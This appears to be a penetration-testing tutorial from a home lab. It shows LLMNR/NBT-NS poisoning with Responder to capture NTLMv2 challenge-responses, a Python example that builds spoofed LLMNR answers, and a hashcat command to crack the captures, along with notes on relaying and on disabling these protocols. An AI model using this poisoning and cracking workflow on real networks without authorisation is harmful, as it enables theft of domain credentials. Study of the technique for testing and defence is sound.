Domain Penetration Testing: Credential Harvesting via LLMNR Poisoning

Depending on the type of pentest (whitebox/greybox/blackbox) you may or may not have a scope. For these examples, I'll assume I have a scope from the customer for their domain, corp.local, which lives on the 192.168.1.0/24 network. For these examples, I have my ESXi server running four VMs:

Windows Server 2008 R2 (Primary DC)

Windows 7 (Workstation)

Windows Server 2003 (Secondary DC)

Windows XP (Unpatched; Workstation)

My initial scan reveals the four machines and their IPs. The workstations look like they might be running old software with exploitable vulnerabilities, but before resorting to traditional exploits like buffer overflows I want to see what credentials I can pick up off the network. To do this, I'll be using a tool called Responder to abuse LLMNR and NBT-NS, two fallback name-resolution protocols that Windows uses unless they have been disabled (they are on by default). To summarize what they do: when you type in a network share, say \\Fileserver01\, and DNS cannot resolve the name, Windows falls back to an LLMNR query (multicast to 224.0.0.252 on UDP 5355) asking whether any host on the segment owns that name. If that fails, it tries an NBT-NS broadcast (UDP 137). When that fails too, you get the error message saying the share cannot be found. With Responder listening, we answer those LLMNR and NBT-NS queries with spoofed responses that point the name at our own IP, in effect saying "yeah, that share is here." The client then connects to Responder's SMB server and authenticates automatically, and what Responder records is not the password or the NT hash itself but the user's NTLMv2 challenge-response (commonly called a Net-NTLMv2 hash). On the defensive side, both protocols can be turned off: LLMNR through the "Turn off multicast name resolution" policy (EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient) and NBT-NS in each adapter's WINS settings.
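To make the exchange concrete, here is a worked example of the LLMNR half of the attack. This is added here for illustration; it is not code from the original post or from Responder. It parses the query a client would multicast for Fileserver01 and builds the spoofed answer a poisoner sends back, then shows what the victim's resolver reads out of it. The transaction ID and the attacker address 192.168.1.50 are constructed sample values. NBT-NS uses a different (NetBIOS) name encoding and is not shown.

```python
import socket
import struct

# LLMNR runs over UDP 5355; queries go to the multicast group 224.0.0.252 and
# the (legitimate or spoofed) answer is unicast straight back to the asker.
LLMNR_GROUP = ("224.0.0.252", 5355)
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style wire name: length-prefixed labels ending in a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(data: bytes, offset: int):
    """Return (name, offset just past the name). LLMNR does not use compression pointers."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_llmnr_query(packet: bytes) -> dict:
    """Parse the one-question query a Windows host sends for a name DNS could not resolve."""
    txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", packet[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    name, off = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_llmnr_response(query: dict, answer_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's answer: same transaction ID, QR bit set, the question echoed,
    and a single A record mapping the asked-for name to the attacker's IP."""
    if query["qtype"] != QTYPE_A:
        raise ValueError("only A queries are answered in this example")
    header = struct.pack("!6H", query["id"], 0x8000, 1, 1, 0, 0)
    question = encode_name(query["name"]) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = (encode_name(query["name"]) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(answer_ip))
    return header + question + answer


def resolve_from_response(response: bytes) -> str:
    """What the victim's resolver does with the reply: skip the question, read the A record."""
    _, flags, qdcount, ancount, _, _ = struct.unpack("!6H", response[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an answer")
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(response, off)
        off += 4  # QTYPE + QCLASS
    _, off = decode_name(response, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("unexpected record type")
    return socket.inet_ntoa(response[off:off + 4])


# Constructed sample (not a capture): the query a client would multicast after
# \\Fileserver01\ fails DNS. The transaction ID and attacker IP are made up.
SAMPLE_QUERY = (struct.pack("!6H", 0x1337, 0x0000, 1, 0, 0, 0)
                + encode_name("Fileserver01") + struct.pack("!HH", QTYPE_A, QCLASS_IN))
ATTACKER_IP = "192.168.1.50"

if __name__ == "__main__":
    q = parse_llmnr_query(SAMPLE_QUERY)
    spoofed = build_llmnr_response(q, ATTACKER_IP)
    print(f"query {q['id']:#06x} for {q['name']!r} -> answered with {resolve_from_response(spoofed)}")
```

The point to notice is how little the poisoner has to get right: the victim accepts any answer whose transaction ID matches the query it just sent, and there is no authentication of the responder at all. Responder also answers for names it has never heard of, which is why a single typo is enough to trigger the SMB connection described above.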

Here it is in action:

By default, Kali has Responder installed already, so all you need to do is type

responder -I eth0

Or whatever interface you’re using.

[Screenshot: Responder started and listening on eth0]

Next, simulate a user mistyping a share name.

[Screenshot: the user typing a non-existent share path in Explorer]

Responder now shows the poisoned LLMNR request:

[Screenshot: Responder showing the poisoned LLMNR request]

and shortly afterwards the user's NTLMv2 challenge-response:

[Screenshot: Responder logging the captured NTLMv2 hash]

What we have is an NTLMv2 challenge-response, not an NT hash, so it cannot be used for pass-the-hash: a plain NT hash (as dumped from the SAM or NTDS.dit) can be passed, but Net-NTLMv1/v2 captures cannot, because the response is bound to the server challenge Responder issued. So we have two options:

  1. We can crack it offline
  2. We can relay it to another host using a tool like ntlmrelayx.py from Impacket

Cracking is always worth trying but doesn't always work, especially if group policy enforces a strong password. Relaying has its own preconditions: the target must be a different host from the victim (reflecting back to the same machine was fixed in MS08-068), it must not require SMB signing, and Responder's own SMB and HTTP servers have to be turned off so ntlmrelayx.py can receive the connection. You can read my write-up on relaying here, but for this write-up I will just crack it. I personally like Hashcat since it can use my GPU.

Note: I have hashcat installed on Windows

Cracking the Hash via Hashcat

By default, Responder writes each capture to /usr/share/responder/logs on Kali, in a file named after the protocol, hash type and client IP (for example SMB-NTLMv2-SSP-<ip>.txt), one line per authentication attempt.

Using the command

hashcat64.exe -m 5600 hash.txt password.txt -o results.txt

Where "hash.txt" is the file containing my hash, "password.txt" is my wordlist and "results.txt" is my output file. -m 5600 selects the hash type, NetNTLMv2; the line Responder logged (user::domain:challenge:response:blob) can be pasted into hash.txt as-is. The default attack mode is -a 0 (straight wordlist), so no -a flag is needed. If Responder captured the same user several times, each line carries a different server challenge, so keep only one line per user to avoid wasting GPU time on duplicates.

Shortly after running the command, the password is cracked.

[Screenshot: hashcat output showing the cracked password]

From here I could RDP into the machine (assuming the account is allowed to log on that way) and do as I please, or use the credentials to enumerate other machines, which is shown in my post here.
